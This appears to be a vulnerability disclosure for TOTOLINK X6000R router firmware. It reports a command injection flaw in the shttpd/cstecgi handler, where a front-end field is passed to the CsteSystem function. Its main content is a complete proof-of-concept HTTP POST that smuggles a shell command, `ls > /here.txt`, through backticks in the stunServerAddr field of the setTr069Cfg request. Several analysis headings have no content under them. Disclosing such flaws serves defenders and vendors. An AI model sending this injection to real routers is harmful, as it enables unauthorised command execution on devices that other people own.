version:

TOTOLINK X6000R-V9.4.0cu.852_B20230719

Vulnerability Introduction

Command Execution Vulnerability

Firmware download address

<https://www.totolink.net/home/menu/detail/menu_listtpl/download/id/247/ids/36.html?_JS140.238.14.1=32a3b88fa917c478ff16813b06e93632b1699790448_184814390>

Vulnerability details

In the shttpd file, sub_4119A0 function obtains fields from the front-end through Uci_ Set_ The Str function passed to the CsteSystem function creates a command execution vulnerability.

In httpd

In libcscommon.so

Uci_Set_Str:

CsteSystem:

effect

POC

POST /cgi-bin/cstecgi.cgi HTTP/1.1
Host: 192.168.118.139
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 281
Origin: <http://192.168.118.139>
Connection: close
Referer: <http://192.168.118.139/advance/tr069_cfg.html>

{"addEffect":"0","enable":"1","url":"www.awa.com","user":"1","pass":"1","informEnable":"0","interval":"","requestUser":"","requestPass":"","stun_user":"","stun_pass":"","stunEnable":"0","stunServerAddr":"`ls > /here.txt`","stunPort":"","stunMaxAlive":"","stunMinAlive":"","topicurl":"setTr069Cfg"}